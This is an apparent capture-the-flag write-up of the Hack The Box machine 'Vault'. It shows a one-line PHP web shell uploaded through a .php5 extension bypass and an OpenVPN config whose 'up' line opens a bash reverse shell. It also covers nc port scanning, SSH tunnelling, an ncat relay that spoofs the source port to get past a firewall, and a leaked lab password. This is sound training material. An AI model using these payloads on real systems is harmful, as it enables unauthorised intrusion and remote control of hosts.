[HTB] Vault — Writeup (OSWE-Prep)

Vault was a medium difficulty Linux box. Gaining the initial access was pretty straight-forward; however, it had some interesting firewall restrictions and container breakout for the privilege escalation portion. Good learning path for:

Initial Recon

Nmap

# nmap -Pn --open -p- -T4 -sV -sC 10.10.10.109Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-09 23:27 EDT
Nmap scan report for 10.10.10.109
Host is up (0.080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
| 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

When I checked the /slowdaddy and /sparklays as potential directories, I got 403 Forbidden for the /sparklays.

Web Directory Enumeration (Dirsearch)

As usual, I ran a quick dirsearch to see if I could discover more of the interesting files/folders under the /sparklays directory.

# python3 dirsearch.py -u http://10.10.10.109/sparklays -e php,html,txt | grep -v 403

This identified the admin.php which was a login page and /design folder.

http://10.10.10.109/sparklays/admin.php/

Since the /design folder rendered as 403 Forbidden, I wanted to enumerate more deeper.

python3 dirsearch.py -u http://10.10.10.109/sparklays/design -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,html,txt | grep -v 403

This found additional endpoint /design/design.html where I could upload an arbitrary file via “Change Logo” functionality.

http://10.10.10.109/sparklays/design/design.html

Initial Foothold

PHP File Upload

It has some file type restrictions implemented that php, phtml, php7, etc were not allowed; however, php5 was allowed:

# cat shell.php5 
<?php system($_GET["bigb0ss"]); ?>

From the PHP file upload, I got the RCE:

http://10.10.10.109/sparklays/design/uploads/shell.php5?bigb0ss=id

Privilege Escalation

www-data → dave@ubuntu (Stored Credentials — SSH)

Further enumeration identified that stored credentials for the dave user:

http://10.10.10.109/sparklays/design/uploads/shell.php5?bigb0ss=cat+/home/dave/Desktop/ssh

With the found credentials, I gained ssh access to the Vault box.

But… the hostname is not Vault but ubuntu indicating I was in some type of container environment. And following files were also found in dave's home directory:

dave@ubuntu → root@DNS (Reverse Shell via OpenVPN Configuration File)

Next, I wanted to dig in IP addresses within the file Servers:

I used the installed nc to perform a quick port scan against the IP Address 192.168.122.4:

dave@ubuntu:~/Desktop$ nc -nvz 192.168.122.4 1-10000 2>&1 | grep -v failed

And this found 2 open ports on the 192.168.122.4 host:

Next, I created a SSH local tunnel in order to access the port 80 on 192.168.122.4 from my local Kali box:

# ssh -L 80:192.168.122.4:80 dave@10.10.10.109
http://127.0.0.1/

Web Directory Enumeration (Dirsearch)

I did additional web directory fuzzing against the http://127.0.0.1 and found /notes directory.

# python3 dirsearch.py -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,html,txt
http://127.0.0.1/notes

And 123.ovpn file contained a reverse shell payload. (More details about OpenVPN reverse shell via configuration file can be found here)

Reverse Shell via OpenVPN Configuration File

Using the above payload and VPN Configurator functionality, I was able to gain root@DNS access.

# Payload (123.ovpn)
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"

user.txt

Under the /home/dave folder, I got the user.txt flag.

root@DNS (Reverse Shell) → root@DNS (Full TTY SSH Shell)

In the dave's home directory, I could find another set of the credentials: dave : dav3gerous567. Using the credentials, I SSH into the DNS host.

The dave user had a full sudo privilege. Using sudo su command, I obtained the full TTY shell on the DNS host as the root user.

root@DNS → dave@vault (Source Port Escaping)

By looking at the /etc/hosts file, I confirmed that the IP Address for Vault was 192.168.5.2.

Further enumeration also found that /var/log/auth.log contained some interesting information.

First, it looked like the DNS host had nmap installed and by specifying the --srouce-port=4444 we could find additional open port on the host 192.168.5.2.

/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Confirming the port 987 was open using Source Port 4444

Secondly, I found a ncat command that looked like opening up the port 987 on the DNS host.

/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53

Since I needed to SSH in by using the source port 4444 of the TCP socket. I modified the above ncat command to open up the port 2222 for SSH connection.

# SSH Terminal 1
root@DNS:/home/dave# ncat -l 2222 --sh-exec "ncat -p 4444 192.168.5.2 987"

And I opened up another SSH session and SSH into the Vault (192.168.5.2) host:

# SSH Terminal 2
root@DNS:/home/dave# ssh dave@127.0.0.1 -p 2222

dave@vault → root.txt (GPG Key Decrypt)

In the home directory, I found root.txt.gpg file which indicated I might need to do something with GPG decrypt to recover the root.txt flag. As I recalled, I found a key file in the ubuntu box containing the key: itscominghome.

I base32'd the root.txt.gpg file and moved it over to the ubuntu box. (base64 was not available in the Vault host)

# Vault Host
dave@vault:~$ base32 root.txt.gpg

Then, I successfully recovered the root.txt flag.

# ubuntu Host
dave@ubuntu:~/Desktop$ base32 -d base32_key > root.txt.gpg
dave@ubuntu:~/Desktop$ gpg -d root.txt.gpg

Post-Ex

changelogo.php (PHP File Upload Source Code)

Since I was doing this box for my OSWE prep, I wanted to dig deeper. Only relevant thing that I thought it might be helpful to understand was to see how the PHP file extension restrictions are configured in changelogo.php file.

And it was pretty simple. It was only allowing the following file extensions:

(gif|jpe?g|png|csv|php5)$/i', $file_name) //set permissible file types

Conclusion

I would say this box might be too easy for OSWE prep in my opinion. Also, PHP file upload portion might be only relevant to the exam material. However, it was really great box overall. Hope you enjoyed reading it as well!

Thanks to TJ_NULL for providing the list for the OSWE-like VMs

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store